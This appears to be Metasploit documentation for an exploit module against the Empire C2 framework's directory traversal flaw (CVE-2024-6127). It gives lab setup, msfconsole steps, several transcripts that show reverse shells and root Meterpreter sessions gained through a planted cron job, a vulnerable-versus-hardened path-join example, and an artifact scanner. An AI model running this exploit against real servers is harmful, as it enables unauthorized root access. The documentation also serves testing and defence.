metasploit-gs/documentation/modules/exploit/linux/http/empire_skywalker.md (2024-07-31 15:43:03 +09:00)

## Vulnerable Application
This module exploits a directory traversal vulnerability in both
BC-SECURITY/Empire C2 Framework (<5.9.3) and ProjectEmpire/Empire (<f030cf62). It
writes the payload to the /tmp/ directory and then writes a cron.d file that executes the payload.
The vulnerability affects:
* BC-SECURITY/Empire C2 Framework (<5.9.3)
* ProjectEmpire/Empire (<f030cf62)
This module was successfully tested on:
* BC-SECURITY/Empire C2 Framework (v5.9.2) on Kali Linux 6.6.15
* BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15
* ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15
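The bug class the module relies on, shown as an added example that is not Empire's or the module's code: a server joining a file name it received from a client onto its downloads directory. `naive_join` is the vulnerable pattern and `resolve_within` the hardened one; `DOWNLOADS_DIR` is the path reported in the scenario output further down and stands in for any server-side base directory, and the sample names are constructed.

```python
import os
from typing import Dict, Iterable, Optional

# Base directory under which the module output on this page reports agent
# files (downloads/<session>/agent.log); it stands in for any server-side
# directory that a client-supplied file name gets joined onto.
DOWNLOADS_DIR = "/var/lib/powershell-empire/empire/server/downloads"


def naive_join(base_dir: str, untrusted_name: str) -> str:
    """The vulnerable pattern: join and normalise, with no containment check.

    A name containing '..' segments, or an absolute path, walks out of
    base_dir and the write lands wherever the name says (for example /tmp).
    """
    return os.path.normpath(os.path.join(base_dir, untrusted_name))


def resolve_within(base_dir: str, untrusted_name: str) -> Optional[str]:
    """The hardened pattern: resolve the name under base_dir or reject it.

    Both paths go through realpath so that '..', doubled slashes and symlinks
    are resolved before the check, and commonpath (not startswith) is used so
    that a sibling such as '<base>-evil' is not mistaken for the base itself.
    Returns the resolved absolute path, or None when the name escapes.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, untrusted_name))
    if candidate == base:
        return None  # empty name or '.' names the directory, not a file
    try:
        if os.path.commonpath([base, candidate]) != base:
            return None  # resolved to somewhere outside the base directory
    except ValueError:
        return None  # commonpath refuses to compare absolute with relative
    return candidate


def classify(base_dir: str, names: Iterable[str]) -> Dict[str, str]:
    """Report, per candidate name, whether the hardened join accepts it."""
    return {
        name: "ok" if resolve_within(base_dir, name) else "rejected"
        for name in names
    }


if __name__ == "__main__":
    # Constructed sample names: one ordinary session path and three escapes.
    samples = ["LML47FWS/agent.log", "../../../../../../../../tmp/x",
               "/tmp/x", "../downloads-evil/x"]
    for name, verdict in classify(DOWNLOADS_DIR, samples).items():
        print(f"{verdict:8} naive={naive_join(DOWNLOADS_DIR, name)!r} name={name!r}")
```

The containment test is done on resolved paths rather than on the string the client sent, because rejecting `..` lexically misses absolute names, encoded separators and symlinked directories; the fix for the class is to decide after resolution, not before.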
### Install and run the vulnerable Empire
#### BC-SECURITY/Empire
1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
3. Pull the pre-built Empire Docker image (<5.9.3) in your VM.
`docker pull bcsecurity/empire:v5.9.2`
4. Run the server and the client on the same VM.
5. Run the server.
`docker run -it --net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d bcsecurity/empire:v5.9.2`
(`--net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d` is not a realistic deployment, but it keeps the setup simple:
the payload is written to the host rather than to the container) or
```
docker run -it --net="host" bcsecurity/empire:v5.9.2
docker exec -it <server container id> bash
apt update
apt install cron
cron
```
(The payload will be written to the container, but you have to set up cron in the container manually.)
6. Run the client.
`docker run -it --net="host" bcsecurity/empire:v5.9.2 client`
7. Execute Empire listener on client.
```bash
uselistener http
set Host <rhost>
set Port <port>
execute
```
#### ProjectEmpire/Empire
1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
3. Clone Empire.
`git clone https://github.com/EmpireProject/Empire.git`
4. `cd Empire`
5. `git checkout 03ca7bdbcc81457da8e8c1419b36adf66fe9b110`
6. `docker pull empireproject/empire`
7. `docker run -it --net="host" -v $(pwd):/opt/Empire -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d empireproject/empire /bin/bash`
(The payload will be written to the host rather than to the container.) or
```
docker run -it --net="host" empireproject/empire /bin/bash
cron
```
(The payload will be written to the container, but you have to set up cron in the container manually.)
8. `cd setup`
9. `./reset.sh` (starts Empire)
10. Execute listener.
```bash
listeners
set Host <rhost>
set Port <port>
run
```
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/empire_skywalker`
4. Do: `set rhost <rhost>`
5. Do: `set rport <port>`
6. Do: `set lhost <attacker-ip>`
7. Optional: `set CVE <cve>`
8. Do: `run`
9. Have the generated request processed by a vulnerable version of Empire
10. You should get a shell or meterpreter
## Options
### TARGETURI (optional)
This is the base URI path. It is used when CVE is set to `Original`. Default is `/`.
### STAGE0_URI (required)
This is the URI path requested by the initial launcher. It is used when CVE is set to `Original`. Default is `index.asp`.
### STAGE1_URI (required)
This is the URI path used by the RSA key post. It is used when CVE is set to `Original`. Default is `index.jsp`.
### PROFILE (optional)
This is the Empire agent traffic profile URI. It is used when CVE is set to `Original`.
### CVE (required)
This is the vulnerability to use. Default is `CVE-2024-6127`, but `Original` can also be chosen.
### STAGE_PATH (required)
This is Empire's default staging path. It is used when CVE is set to `CVE-2024-6127`. Default is `login/process.php`.
([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))
### PROFILE (required)
This is Empire's default agent communication profile (a User-Agent string). It is used when CVE is set to `CVE-2024-6127`.
Default is `Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko`.
([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))
## Scenarios
### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 0, port 80)
```
msf6 > use exploit/linux/http/empire_skywalker
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.7
rhost => 192.168.56.7
msf6 exploit(linux/http/empire_skywalker) > set rport 80
rport => 80
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.7:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/NYLkIKRK
[*] Writing cron job to /etc/cron.d/AeVTTPiZ
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.7
[+] Deleted /etc/cron.d/AeVTTPiZ
[+] Deleted /tmp/NYLkIKRK
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:48026) at 2024-07-20 11:32:03 +0900
[!] This exploit may require manual cleanup of '/var/lib/powershell-empire/empire/server/downloads/LML47FWS/agent.log' on the target
meterpreter > sysinfo
Computer : kali
OS : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture : x64
System Language : en_US
Meterpreter : python/linux
```
### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
```
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/jJzYkeKV
[*] Writing cron job to /etc/cron.d/nFnFIbim
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/nFnFIbim
[+] Deleted /tmp/jJzYkeKV
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/WV9TEJTE/agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:42068) at 2024-07-20 14:40:09 +0900
whoami
root
```
### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
```
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/qxlOSIYF
[*] Writing cron job to /etc/cron.d/ugrYIJzf
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/ugrYIJzf
[+] Deleted /tmp/qxlOSIYF
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/JJR8EMKK/agent.log, unknown result
[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:46040) at 2024-07-20 14:44:09 +0900
whoami
root
```
### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 0, port 8080)
```
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set CVE Original
CVE => Original
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/PSDaqPOJ
[*] Writing cron job to /etc/cron.d/KQlwBZQk
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/KQlwBZQk
[+] Deleted /tmp/PSDaqPOJ
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:38552) at 2024-07-24 18:01:04 +0900
[!] This exploit may require manual cleanup of '/agent.log' on the target
meterpreter > sysinfo
Computer : kali
OS : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
```
### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
```
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set CVE Original
CVE => Original
msf6 exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/VzTAquhE
[*] Writing cron job to /etc/cron.d/LjvThMOu
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/LjvThMOu
[+] Deleted /tmp/VzTAquhE
[!] Tried to delete /agent.log, unknown result
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:47140) at 2024-07-24 18:06:08 +0900
whoami
root
```
### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
```
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set cve Original
cve => Original
msf6 exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/uuTqlfDp
[*] Writing cron job to /etc/cron.d/frDtYnmD
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/frDtYnmD
[+] Deleted /tmp/uuTqlfDp
[!] Tried to delete /agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:51566) at 2024-07-24 18:08:08 +0900
whoami
root
```
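For whoever has to find this on a host afterwards: the scenario output above names the three things the module leaves behind (a random 8-letter file in /tmp, a cron.d entry with a random 8-letter name, and an agent.log under the downloads directory) and reports that the first two are deleted while the agent.log may need manual cleanup. The scanner below is an added example, not code from the module or from Empire. It checks a cron.d directory and a downloads directory for those shapes; it builds its own throwaway sample layout with `tempfile`, the cron line in that sample is constructed (the page shows the file names the module used, not the line it wrote), and the sysstat entry, modelled on Debian's, is there as a benign control.

```python
import os
import re
import tempfile
from typing import Dict, List

# Artifact shapes taken from the module output on this page: an 8-letter
# random file under /tmp, a cron.d file with another 8-letter random name that
# runs it, and an agent.log left under downloads/<session id>/.
RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")
TMP_EXEC = re.compile(r"/tmp/[A-Za-z]{8}\b")


def scan_cron_d(cron_dir: str) -> List[Dict[str, str]]:
    """Flag cron.d entries whose command runs a random-looking file from /tmp."""
    findings: List[Dict[str, str]] = []
    if not os.path.isdir(cron_dir):
        return findings
    for name in sorted(os.listdir(cron_dir)):
        path = os.path.join(cron_dir, name)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                entry = line.strip()
                if not entry or entry.startswith("#") or not TMP_EXEC.search(entry):
                    continue
                reason = "runs an 8-letter random file from /tmp"
                if RANDOM_NAME.match(name):
                    reason += "; cron.d file name is itself 8 random letters"
                findings.append({"file": path, "line": str(lineno),
                                 "entry": entry, "reason": reason})
    return findings


def find_agent_logs(downloads_dir: str) -> List[Dict[str, str]]:
    """List agent.log files under the downloads directory with their session ids."""
    hits: List[Dict[str, str]] = []
    for root, _dirs, files in os.walk(downloads_dir):
        if "agent.log" in files:
            hits.append({"session": os.path.basename(root),
                         "path": os.path.join(root, "agent.log")})
    return sorted(hits, key=lambda h: h["session"])


def build_sample_host() -> Dict[str, str]:
    """Construct a throwaway host layout so both scanners can run offline.

    The sysstat entry is the benign control (modelled on Debian's cron.d line);
    the other entry is a constructed stand-in for the module's cron job, using
    the file names shown in the first scenario on this page.
    """
    root = tempfile.mkdtemp(prefix="empire_artifacts_")
    cron_dir = os.path.join(root, "etc", "cron.d")
    downloads = os.path.join(root, "var", "lib", "powershell-empire",
                             "empire", "server", "downloads")
    os.makedirs(cron_dir)
    os.makedirs(os.path.join(downloads, "LML47FWS"))
    with open(os.path.join(cron_dir, "sysstat"), "w") as fh:
        fh.write("5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1\n")
    with open(os.path.join(cron_dir, "AeVTTPiZ"), "w") as fh:
        fh.write("* * * * * root /tmp/NYLkIKRK\n")  # constructed sample line
    with open(os.path.join(downloads, "LML47FWS", "agent.log"), "w") as fh:
        fh.write("constructed placeholder\n")
    return {"cron_dir": cron_dir, "downloads": downloads}


if __name__ == "__main__":
    host = build_sample_host()
    for finding in scan_cron_d(host["cron_dir"]):
        print(f"[cron] {finding['file']}:{finding['line']} {finding['entry']!r} ({finding['reason']})")
    for hit in find_agent_logs(host["downloads"]):
        print(f"[log]  session {hit['session']}: {hit['path']}")
```

To run it against a live host instead of the sample layout, call `scan_cron_d("/etc/cron.d")` and `find_agent_logs` on the downloads path shown in the scenario output; the cron.d and /tmp artifacts are short-lived (the module deletes them once the job fires, and cron runs within a minute), so the agent.log directory and cron's own logging are the more durable evidence.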